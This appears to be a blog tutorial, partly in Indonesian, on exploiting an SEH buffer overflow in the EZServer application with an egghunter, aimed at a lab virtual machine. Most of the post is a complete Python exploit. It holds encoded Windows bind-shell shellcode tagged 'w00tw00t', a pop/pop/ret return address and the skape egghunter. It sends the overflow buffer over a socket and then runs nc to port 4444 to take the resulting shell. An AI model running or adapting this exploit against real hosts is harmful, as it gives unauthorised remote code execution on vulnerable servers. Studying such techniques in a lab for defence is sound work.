Software Exploitation : Ezserver Using Egghunter

scx020c06a 13.31 Tidak ada komentar
Exploit : Ezserver using Egghunter

Last post I have told you the way to exploit ezserver to open calculator app. It was a great POC. But there is a problem, because we can't send our payload to esp register. The register is to small for our shellcode but the buffer is huge space. The technique now is to use egghunter. Egghunter is a piece of code that basically search for our shellcode anywhere in the memory. It searches for the “keyword” then execute code after the keyword is found.
In this post I will use egghunter code from skape and from this website.

So here is our plan for fuzzer

[+] How its work

- The previously our buffer with "A"s, now we will fill it with our shellcode and adjust it to keep it fit with eip offset.
5884 - 100 - 352 = 5432 bytes

- Our shellcode append with "w00tw00t"
8 + 344 = 352 bytes

- Egghunter code




[+] Try the hunter

- Next is try to see if the egghunter code is working by using \xCC to stop the execution of our application in debugger.

- Open ollydebugger, attach it to ezserver application.
- Run script below with our \xcc and adjusted alignment.

awalan="\x90" * (5784 - 12)  
cece=("w00tw00t" +"\xcc\xcc\xcc\xcc") 
buffer = "\x90" * 100  
offset="\xeb\x06\x90\x90"
popret="\x96\x96\x20\x10" 
nopsled="\x90" * 2
egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
+"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
akhiran="\x90" * (250 - len(egghunt)) 

LHOST="192.168.56.101"
LPORT=8000
print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT)
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((LHOST,LPORT))
sock.send( awalan+ cece + buffer + offset + popret + nopsled + egghunt + akhiran )
print ("[+] Buffer send success..\n")
sock.close()

- Pass the exeption in olly and wait few seconds then it hit our cc. 



- By this means our egghunter code is running and it successfully find our code in this case four "\xCC".

[+] Connecting

- By far our code is running okey, now we will use windows bind shell as our payload, in port 4444.
- Here is my final code.

#!/usr/bin/python
import socket, sys, os
from time import sleep

print "\n ================================= "
print " >      EZServer SEH Overflow    <"
print " >         Written by aldo       <" 
print " >           i-s-2-c             <"
print " =================================\n"

awalan="\x90" * (5784 - 352) #len(payload)
payload=("w00tw00t" +
"\xdb\xd3\xba\xd2\x1b\x8d\xdf\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5f"
"\x31\x57\x17\x03\x57\x17\x83\x3d\xe7\x6f\x2a\x3d\x72\x9b\x98\x55"
"\x7a\xa4\xdc\x5a\x1d\xd0\x4f\x80\xfa\x6d\xca\xf4\x89\x0e\xd0\x7c"
"\x8f\x01\x51\x33\x97\x56\x39\xeb\xa6\x83\x8f\x60\x9c\xd8\x11\x98"
"\xec\x1e\x88\xc8\x8b\x5f\xdf\x17\x55\x95\x2d\x16\x97\xc1\xda\x23"
"\x43\x32\x0b\x26\x8e\xb1\x14\xec\x51\x2d\xcc\x67\x5d\xfa\x9a\x28"
"\x42\xfd\x77\xd5\x56\x76\x0e\xb5\x82\x94\x70\x86\xfa\x7f\x16\x83"
"\xbe\x4f\x5c\xd3\x4c\x3b\x12\xcf\xe1\xb0\x93\xe7\xa7\xae\x9d\xb9"
"\x59\xc3\xf2\xba\xb0\x7d\xa0\x22\x55\xb1\x74\xc2\xd2\xc6\x4a\x4d"
"\x49\xd6\x7b\x19\xba\xc5\x80\xe2\x6c\xe9\xaf\x4b\x04\xf0\x36\xf2"
"\xfb\xf3\xb4\xa1\x69\x06\x46\x99\x06\xdf\xb1\xec\x7a\x88\x3e\xd8"
"\xd6\x64\x92\xb7\x8b\xc9\x47\x74\x7f\x31\xb7\x1c\x17\xdc\x64\x86"
"\xb4\x57\x75\xd3\x53\xcc\x6c\xab\x64\x5b\x6e\x9d\x01\x74\xc1\x74"
"\x29\xa4\x89\xd2\x78\x6b\xa3\x4d\x7c\xa2\x60\x24\x7d\x9b\xef\x23"
"\xc8\x9a\xb9\xfc\x34\x74\x69\x56\x9f\x2c\x75\x86\x8c\xa7\x6e\x5f"
"\x75\x4e\x26\x60\xaf\xe4\x37\x4e\x36\x6d\xac\x08\xdf\x12\x41\x5d"
"\xfa\xbf\xc9\x04\x2c\x8c\x63\x51\x44\x48\xfd\x7f\xa8\x90\x0e\xd5"
"\x35\x52\xdc\xd7\x88\x7f\x8d\xaa\x77\xb8\x1a\x1f\x2c\xd0\x2e\xa1"
"\x80\x37\x30\x28\xa3\xc8\x18\x89\x7c\x65\xf4\x7c\xd2\xe3\xf7\x2f"
"\x85\xa6\xa6\x30\xf5\x21\xe4\x17\xf3\x7f\xa5\x58\x2a\x15\xb5\x59"
"\xe4\x15\x99\x2e\x5c\x16\x99\xf4\x07\x19\x48\xa6\x38\x35\x1d\x38"
"\x1f\x54\xad\x97\x60\x4f\xad\xc7")  # size 344 + 8 = 352 
buffer = "\x90" * 100     #align the stack (kurang awalan 5884 | 100)
offset="\xeb\x06\x90\x90"  #jmp 6 byte
popret="\x96\x96\x20\x10"  #posisi seh -> eip
nopsled="\x90" * 2
egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
+"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") #32 byte egghunter
akhiran="\x90" * (250 - len(egghunt)) 

LHOST="192.168.56.101"
LPORT=8000
print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT)
try:
 sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 sock.connect((LHOST,LPORT))
 sock.send(awalan+ payload + buffer + offset + popret + nopsled + egghunt + akhiran )
 print ("[+] Buffer send success..\n")
 sock.close()
 print "[+] Wait for hatch (0)..\n"
 sleep(5)
 print "[+] Connecting...\n"
 sleep(9)
 os.system("nc -n %s 4444" %LHOST)
except:
 print "[-] Could not connect to %s on port %d\n" % (LHOST,LPORT)
 sys.exit(0)



- Run Ezserver application.


- The running script.


- Win.

Tidak ada komentar :

Posting Komentar

Langganan: Posting Komentar ( Atom )